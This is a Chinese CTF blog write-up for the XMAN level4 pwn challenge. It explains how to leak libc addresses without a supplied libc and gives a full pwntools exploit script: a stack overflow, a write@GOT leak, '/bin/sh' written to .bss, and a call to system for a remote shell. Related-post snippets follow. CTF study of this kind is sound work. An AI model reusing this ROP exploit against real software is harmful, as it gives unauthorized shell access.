xman level4//一步一步rop level2 writeup

最新推荐文章于 2021-05-12 11:24:58 发布
最新推荐文章于 2021-05-12 11:24:58 发布
阅读量857 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014281987/article/details/52357400
版权

这道题在没libc的情况下考泄露地址,两个方法,一个read之后直接pop三个栈参数再返回system,另一个重新返回vulnerable,只不过read(8字节),所以是send,不是sendline啊

另外一个大坑点在dynelf的使用,只能通过它泄漏偏移,然后用不带它的再写一遍

传说中的不用libc的另一方法http://www.cnblogs.com/wangaohui/p/5123992.html

from pwn import *

p=remote('218.2.197.235',20433)
elf=ELF('./level4')
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']
vul=0x0804844B
bss=0x0804A024
def leak(add):
        payload='A'*(0x88+4)+p32(write_plt)+p32(vul)+p32(1)+p32(add)+p32(4)
        p.sendline(payload)
        addc=p.recv(4)
        return addc
#d = DynELF(leak, elf=ELF('./level4'))

#system_addr = d.lookup('system', 'libc')
#print "system_addr=" + hex(system_addr)
#payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
#p.sendline(payload)
#p.sendline('/bin/sh\0')
#payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
#p.sendline(payload)
#p.interactive()
wr=leak(elf.got['write'])
offset=-0x8ab00
system_addr=u32(wr)+offset
#pppr = 0x08048509

#payload='A'*(0x88+4)+p32(read_plt)+p32(pppr)+p32(0)+p32(bss)+p32(8)+p32(system_addr) + p32(vulfun_addr) + p32(bss)

#p.sendline(payload)
#p.send("/bin/sh\0")
payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
p.sendline(payload)
p.send('/bin/sh\0')
payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
p.sendline(payload)
p.interactive()


lulu_ctf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Xman非常好用
07-30
请勿在未经授权的情况下上传任何涉及著作权侵权的资源,除非该资源完全由您个人创作
[Jarvis OJ - PWN]——[XMAN]level4
Y_peak的博客
02-16 202
[Jarvis OJ - PWN]——[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x100 - 0x88 = 120, 多余的空间足够我们进行栈溢出利用 但是我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 e
XMAN-level4
weixin_30847271的博客
01-31 143
[XMAN] level4 首先checksec,信息如下 [*] '/root/Desktop/bin/pwn/xman-level4/level4' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: ...
18.9.20 Jarvis OJ PWN----[XMAN]level4
qq_42192672的博客
09-20 463
checksec之后,发现可以栈溢出 找可以溢出的地方 我们可以读取无穷无尽的数 但是在IDA中没找到system函数,同时题目也没有给我们lib文件,咋办………… 根据大佬的资料,了解到了pwntools的一个函数DynELF,DynELF函数可以leak system的真实地址,当然最后我们还是要用rop代码重新还原回去执行的 先看一下DynELF怎么用,基本流程如下 d ...
linux获取字符格式化,Linux 格式化字符串漏洞利用
weixin_29504987的博客
05-12 195
目的是接觸一些常見的漏洞,增加自己的視野。格式化字符串危害最大的就兩點,一點是leak memory,一點就是可以在內存中寫入數據,簡單來說就是格式化字符串可以進行內存地址的讀寫。下面結合着自己的學習經歷,把漏洞詳細的講解一下,附上大量的實例。0x01 漏洞簡述0x1 簡介格式化字符串漏洞是一種常見的漏洞,原理和利用方法也很簡單,主要利用方式就是實現內存任意讀和寫。前提是其中的參數可控。如果要深入...
linux栈溢出4-绕过ROP、ASLR(不知道libc.so)
小强的博客
07-31 1158
调试环境是ubuntu14 32位 这次开启了DEP、ASLR(不知道libc.so情况下) 还是参考了《一步一步学ROP之linux_x64篇》这篇文章。 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf
xman-frontend
05-29
Xman 前端 运行项目 克隆项目 运行npm install或yarn 运行npm start或yarn start 与后端集成 前端通过 REST API 连接到后端的不同服务。 服务的文档链接如下 如果您需要访问用户的访问令牌,您可以通过 import ...
xman-service-auth
05-28
用于节点js的xman oauth2-server 使用PostgreSQL和NodeJS Techstack的xman oauth 2服务器要求使用项目之前需要安装的东西Nodejs的节点包管理器PostgreSQL私钥和公钥ECDSA安装指南在使用项目的全部功能之前,需要做...
xmdp:Xman 的桌面
05-29
XMDP是XMan’s Desktop Platform的简称。XMan是本文的作者,我们是一个小团体,就像电影里的那帮神奇能力者一样。我们打算构建自己的桌面平台,为了便于大家以及未来的成员开展工作,所以打算一边撰写相关的说明文档...
Unicode-XMan.rar_beta
09-24
Unicode XMan Version 1.0 Beta (20090910),Unicode字符浏览表,反映了Unicode不同版本的更新历史,html格式
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 402
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
Linux pwn入门教程(5)——利用漏洞获取libc
子曰小玖的博客
06-04 1872
https://bbs.ichunqiu.com/thread-42933-1-1.html?from=aqzx1 0x00 DynELF简介 在前面几篇文章中,为了降低难度,很多通过调用库函数system的题目我们实际上都故意留了后门或者提供了目标系统的libc版本。我们知道,不同版本的libc,函数首地址相对于文件开头的偏移和函数间的偏移不一定一致。所以如果题目不提供libc...
Jarvis OJ --level4
Kni9hT's Blog
11-11 226
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
做jarvisoj pwn level4时LibcSearcher和DynELF搜到的libc版本不同
weixin_43350880的博客
08-07 719
jarvisoj pwn的level4乍一看是一道常规的ROP,可以ret2libc 但是遇到一个问题 自己写的脚本本地能跑通,远程跑不通 可以看到本地是能拿到shell的 在网上搜了其他人的wp,全都是用DynELF做的,对比发现是LibcSearcher和DynELF搜到的libc版本不同导致远程跑不通。 远程用DynELF找到的libc版本 远程LibcSearcher的结果 本地Dyn...
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1134
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1261
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1130
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
CTF必备技能丨Linux Pwn入门教程——利用漏洞获取libc
dfdhxb995397的博客
07-26 573
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有...
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4959
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
最新发布
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值